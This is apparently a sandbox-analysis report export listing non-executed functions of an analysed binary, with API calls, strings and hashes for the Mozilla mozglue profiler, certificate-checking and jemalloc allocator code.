                                                                                                      Non-executed Functions

                                                                                                      Function 6CFA5440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6CFA5492
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFA54A8
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFA54BE
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA54DB
                                                                                                        • Part of subcall function 6CFCAB3F: EnterCriticalSection.KERNEL32(6D01E370,?,?,6CF93527,6D01F6CC,?,?,?,?,?,?,?,?,6CF93284), ref: 6CFCAB49
                                                                                                        • Part of subcall function 6CFCAB3F: LeaveCriticalSection.KERNEL32(6D01E370,?,6CF93527,6D01F6CC,?,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CFCAB7C
                                                                                                        • Part of subcall function 6CFCCBE8: GetCurrentProcess.KERNEL32(?,6CF931A7), ref: 6CFCCBF1
                                                                                                        • Part of subcall function 6CFCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CF931A7), ref: 6CFCCBFA
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFA54F9
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6CFA5516
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFA556A
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFA5577
                                                                                                      • moz_xmalloc.MOZGLUE(00000070), ref: 6CFA5585
                                                                                                      • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6CFA5590
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6CFA55E6
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFA5606
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFA5616
                                                                                                        • Part of subcall function 6CFCAB89: EnterCriticalSection.KERNEL32(6D01E370,?,?,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284), ref: 6CFCAB94
                                                                                                        • Part of subcall function 6CFCAB89: LeaveCriticalSection.KERNEL32(6D01E370,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CFCABD1
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFA563E
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFA5646
                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6CFA567C
                                                                                                      • free.MOZGLUE(?), ref: 6CFA56AE
                                                                                                        • Part of subcall function 6CFB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CFB5EDB
                                                                                                        • Part of subcall function 6CFB5E90: memset.VCRUNTIME140(6CFF7765,000000E5,55CCCCCC), ref: 6CFB5F27
                                                                                                        • Part of subcall function 6CFB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CFB5FB2
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6CFA56E8
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFA5707
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6CFA570F
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6CFA5729
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6CFA574E
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6CFA576B
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6CFA5796
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6CFA57B3
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6CFA57CA
                                                                                                      Strings
                                                                                                      • [I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6CFA5B38
                                                                                                      • [I %d/%d] profiler_init, xrefs: 6CFA564E
                                                                                                      • [I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6CFA5717
                                                                                                      • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CFA54B9
                                                                                                      • [I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6CFA5BBE
                                                                                                      • MOZ_PROFILER_STARTUP, xrefs: 6CFA55E1
                                                                                                      • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CFA54A3
                                                                                                      • - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6CFA5D1C
                                                                                                      • MOZ_PROFILER_STARTUP_DURATION, xrefs: 6CFA5749
                                                                                                      • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CFA548D
                                                                                                      • MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6CFA5766
                                                                                                      • MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6CFA5791
                                                                                                      • [I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6CFA5C56
                                                                                                      • MOZ_BASE_PROFILER_HELP, xrefs: 6CFA5511
                                                                                                      • MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6CFA57C5
                                                                                                      • - MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6CFA5D2B
                                                                                                      • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6CFA5AC9
                                                                                                      • - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6CFA5CF9
                                                                                                      • GeckoMain, xrefs: 6CFA5554, 6CFA55D5
                                                                                                      • MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6CFA56E3
                                                                                                      • MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6CFA57AE
                                                                                                      • - MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6CFA5D01
                                                                                                      • MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6CFA5724
                                                                                                      • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6CFA584E
                                                                                                      • - MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6CFA5D24
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
                                                                                                      • String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
                                                                                                      • API String ID: 3686969729-1266492768
                                                                                                      • Opcode ID: efa98bc6f8aa79758231369a9b2ae76132544f6babb32abbdf0c5a5ef592b6bd
                                                                                                      • Instruction ID: 9cdba52af97d50978f02bcbef490cafd4246ef1ad79d910f3f3d0a5a82a0167c
                                                                                                      • Opcode Fuzzy Hash: efa98bc6f8aa79758231369a9b2ae76132544f6babb32abbdf0c5a5ef592b6bd
                                                                                                      • Instruction Fuzzy Hash: 5E2201B5908B00DFEB009FF5881576ABBB4AF47348F044529F85A97B81EB31D94ACB53
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFA6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CFA6CCC
                                                                                                      • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CFA6D11
                                                                                                      • moz_xmalloc.MOZGLUE(0000000C), ref: 6CFA6D26
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CFA6D35
                                                                                                      • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CFA6D53
                                                                                                      • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CFA6D73
                                                                                                      • free.MOZGLUE(00000000), ref: 6CFA6D80
                                                                                                      • CertGetNameStringW.CRYPT32 ref: 6CFA6DC0
                                                                                                      • moz_xmalloc.MOZGLUE(00000000), ref: 6CFA6DDC
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CFA6DEB
                                                                                                      • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CFA6DFF
                                                                                                      • CertFreeCertificateContext.CRYPT32(00000000), ref: 6CFA6E10
                                                                                                      • CryptMsgClose.CRYPT32(00000000), ref: 6CFA6E27
                                                                                                      • CertCloseStore.CRYPT32(00000000,00000000), ref: 6CFA6E34
                                                                                                      • CreateFileW.KERNEL32 ref: 6CFA6EF9
                                                                                                      • moz_xmalloc.MOZGLUE(00000000), ref: 6CFA6F7D
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CFA6F8C
                                                                                                      • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CFA709D
                                                                                                      • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CFA7103
                                                                                                      • free.MOZGLUE(00000000), ref: 6CFA7153
                                                                                                      • CloseHandle.KERNEL32(?), ref: 6CFA7176
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA7209
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA723A
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA726B
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA729C
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA72DC
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA730D
                                                                                                      • memset.VCRUNTIME140(?,00000000,00000110), ref: 6CFA73C2
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA73F3
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA73FF
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA7406
                                                                                                      • VerSetConditionMask.NTDLL ref: 6CFA740D
                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CFA741A
                                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6CFA755A
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CFA7568
                                                                                                      • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CFA7585
                                                                                                      • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CFA7598
                                                                                                      • free.MOZGLUE(00000000), ref: 6CFA75AC
                                                                                                        • Part of subcall function 6CFCAB89: EnterCriticalSection.KERNEL32(6D01E370,?,?,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284), ref: 6CFCAB94
                                                                                                        • Part of subcall function 6CFCAB89: LeaveCriticalSection.KERNEL32(6D01E370,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CFCABD1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                      • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                      • API String ID: 3256780453-3980470659
                                                                                                      • Opcode ID: 25d53f720e658468b3ade5a535ef0fe9aa0200abf63e265ba0146b7b9f7f6958
                                                                                                      • Instruction ID: 3c680a9c11352a74da59ea670855383536b04e149ad6a6070f70228647a628ce
                                                                                                      • Opcode Fuzzy Hash: 25d53f720e658468b3ade5a535ef0fe9aa0200abf63e265ba0146b7b9f7f6958
                                                                                                      • Instruction Fuzzy Hash: 0352D3B2900315DFEB21DFA4CC85FAAB7BCEF46704F10419AE919A7640DB70AA85CF51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFC6FF0 Relevance: 89.1, APIs: 39, Strings: 10, Instructions: 3347COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E7DC), ref: 6CFC7019
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E7DC), ref: 6CFC7061
                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CFC71A4
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFC721D
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFC723E
                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CFC726C
                                                                                                      • memset.VCRUNTIME140(?,000000E5,000000FF), ref: 6CFC72B2
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFC733F
                                                                                                      • EnterCriticalSection.KERNEL32(0000000C), ref: 6CFC73E8
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFC961C
                                                                                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFC9622
                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CFC9642
                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CFC964F
                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CFC96CE
                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CFC96DB
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01E804), ref: 6CFC9747
                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6CFC9792
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFC97A5
                                                                                                      • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6D01E810,00000040), ref: 6CFC97CF
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6D01E7B8,00001388), ref: 6CFC9838
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6D01E744,00001388), ref: 6CFC984E
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6D01E784,00001388), ref: 6CFC9874
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6D01E7DC,00001388), ref: 6CFC9895
                                                                                                      Strings
                                                                                                      • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6CFC9993
                                                                                                      • <jemalloc>, xrefs: 6CFC9B33, 6CFC9BE3
                                                                                                      • : (malloc) Unsupported character in malloc options: ', xrefs: 6CFC9BF4
                                                                                                      • Compile-time page size does not divide the runtime one., xrefs: 6CFC9B38
                                                                                                      • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6CFC99A8
                                                                                                      • MALLOC_OPTIONS, xrefs: 6CFC97CA
                                                                                                      • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6CFC99BD
                                                                                                      • MOZ_CRASH(), xrefs: 6CFC9B42
                                                                                                      • MOZ_RELEASE_ASSERT(mNode), xrefs: 6CFC9933, 6CFC9A33, 6CFC9A4E
                                                                                                      • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6CFC99D2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CountEnterInitializeK@1@LeaveMaybe@_RandomSpinUint64@mozilla@@$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable_errnomemcpymemset
                                                                                                      • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                                                      • API String ID: 4047164644-4173974723
                                                                                                      • Opcode ID: dcc8594ee2479b41a9fffdde7d50af58666c2f2166854b040a36b879a5f5572a
                                                                                                      • Instruction ID: 8b39b1e450350d90564345cbb94deaf6b1898fdc405aa8f746caf008097d908e
                                                                                                      • Opcode Fuzzy Hash: dcc8594ee2479b41a9fffdde7d50af58666c2f2166854b040a36b879a5f5572a
                                                                                                      • Instruction Fuzzy Hash: DE535F72B057028FD704CF29C581716BBE1BF85328F29C66EE8699B791D771E841CB82
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFD0DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CFD0F1F
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFD0F99
                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6CFD0FB7
                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CFD0FE9
                                                                                                      • memset.VCRUNTIME140(?,000000E5,00000000), ref: 6CFD1031
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFD10D0
                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CFD117D
                                                                                                      • memset.VCRUNTIME140(?,000000E5,?), ref: 6CFD1C39
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E744), ref: 6CFD3391
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E744), ref: 6CFD33CD
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFD3431
                                                                                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFD3437
                                                                                                      Strings
                                                                                                      • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6CFD3793
                                                                                                      • <jemalloc>, xrefs: 6CFD3941, 6CFD39F1
                                                                                                      • : (malloc) Unsupported character in malloc options: ', xrefs: 6CFD3A02
                                                                                                      • Compile-time page size does not divide the runtime one., xrefs: 6CFD3946
                                                                                                      • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6CFD37A8
                                                                                                      • MALLOC_OPTIONS, xrefs: 6CFD35FE
                                                                                                      • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6CFD37BD
                                                                                                      • MOZ_CRASH(), xrefs: 6CFD3950
                                                                                                      • MOZ_RELEASE_ASSERT(mNode), xrefs: 6CFD3559, 6CFD382D, 6CFD3848
                                                                                                      • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6CFD37D2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
                                                                                                      • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                                                      • API String ID: 3040639385-4173974723
                                                                                                      • Opcode ID: 4da6d35e7993cdcf085f2fc68247a132e974c57c8c1dc35bcf4f155af494b56f
                                                                                                      • Instruction ID: f96d78a87210c012c222e05c4d227d8177338d9a9b7ede3420b179302bdea8f6
                                                                                                      • Opcode Fuzzy Hash: 4da6d35e7993cdcf085f2fc68247a132e974c57c8c1dc35bcf4f155af494b56f
                                                                                                      • Instruction Fuzzy Hash: 3C534972A056028FD704CF29C540716BBF1BF8A328F2EC66DE8699B791D771E845CB81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFF34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3527
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF355B
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF35BC
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF35E0
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF363A
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3693
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF36CD
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3703
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF373C
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3775
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF378F
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3892
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF38BB
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3902
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3939
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3970
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF39EF
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3A26
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3AE5
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3E85
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3EBA
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF3EE2
                                                                                                        • Part of subcall function 6CFF6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6CFF61DD
                                                                                                        • Part of subcall function 6CFF6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6CFF622C
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF40F9
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF412F
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF4157
                                                                                                        • Part of subcall function 6CFF6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CFF6250
                                                                                                        • Part of subcall function 6CFF6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFF6292
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF441B
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF4448
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CFF484E
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CFF4863
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CFF4878
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CFF4896
                                                                                                      • free.MOZGLUE ref: 6CFF489F
                                                                                                      Strings
                                                                                                      Memory Dump Source
